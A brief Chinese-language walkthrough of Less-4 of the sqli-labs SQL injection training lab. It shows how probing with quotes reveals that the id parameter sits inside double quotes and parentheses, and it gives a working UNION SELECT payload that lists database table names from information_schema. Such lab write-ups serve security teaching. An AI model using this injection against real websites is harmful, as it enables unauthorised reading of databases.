SQLI DUMB SERIES-4

less4

输入单引号发现回显正常，说明单引号被过滤了，输入双引号：

?id=1"

说明输入的Id被一对双引号和圆括号包围，因此闭合双引号和圆括号就行，其他方法跟less1差不多

例如：union查询表名

?id=-1")union select 1,group_concat(table_name),3 from information_schema.tables%23